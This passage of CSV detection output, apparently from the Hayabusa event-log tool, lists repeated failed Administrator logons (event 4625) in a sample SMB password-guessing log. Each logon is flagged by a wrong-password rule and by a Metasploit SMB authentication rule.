Password,User: Administrator : Type: 3 : Workstation: hMn6yDMLgLChJTL6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.461 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: uSTokOJ31Tj0bLXv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.501 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TyRifC46GrNpTA4x : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.534 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: CvNaby30vAT9drAX : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.577 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: wkYSOQ2bD51a4U8l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.625 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rqdOquL9Ax01RPPU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.669 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nqCCiK5arcyRHha6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.705 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TpyTGZLkAb0w0kgW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.749 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wa2pXrZKxeZZYKAq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.789 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dK0N5KeBgCze1YWi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:39.900 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: g4dHlwZjMzI5wU2s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.029 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GzF2ouP5KkRfsxnf : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.075 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RSQxMrGlDiAOo6ri : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.109 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: gL0rz3p1yG6RhfAT : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.148 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oyChoTSKgJeK6yqs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.196 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tG4I11dwpBM9SM3l : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.234 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B7foAZ5Y1igCbHap : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.276 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ATDXUljQwg8WvUVs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.327 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QdmXaJqQMAG2g6Ao : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.373 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bjame5puT5CDeoIG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.413 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: 0FGGVVkckmdURVh6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.454 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j0Smqw4cA4wG2Q6m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.485 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KLWloOhUYEQlj6y6 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.521 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9Tuxuykh0j5afeTH : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.569 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aeXS6QwYhqJAOeuz : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.609 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AqFSJCq5bmBW6dj1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.666 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DH1zyt1hxTgzajhW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.718 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rrZxcWjUX4OgYYIb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.761 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ExtkYXSJI8F41uvw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.807 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sLh1Q3RieOoukiCT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.845 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: kNb2hZDxi4QrbQpx : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.881 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jCb1TMlFj2PjH2sA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.923 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rgF42C57Nx6F3HU3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:40.973 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KZfFH9geIrxVYowJ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.005 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pWz1XeyxywR0o5gS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.039 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: og1kItEC6WhqXF37 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.083 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Q0KhaJlD6tWwF2ky : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.121 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XUy0EKmjyD6ZYENA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.165 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: h3MdGstPPFJDGzwG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.217 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VTs0ZQa6LGrKZKsY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.264 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong 
Password,User: Administrator : Type: 3 : Workstation: FefzWjMXSvMdvqcw : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.304 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hlnUt9tPRSXR5mWs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.345 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dehb4M6pcxi56Bkl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.384 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tLXHvGiUqZyxax4W : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.437 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP1gKcf1eeKm0RB1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.473 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ldbN1odP77n0BOzO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.525 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit SMB Authentication,,rules/sigma/builtin/security/win_metasploit_authentication.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: drRC8qCbPe5e4mdR : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:52:41.562 +09:00,DESKTOP-M5SN04R,4625,high,Metasploit 
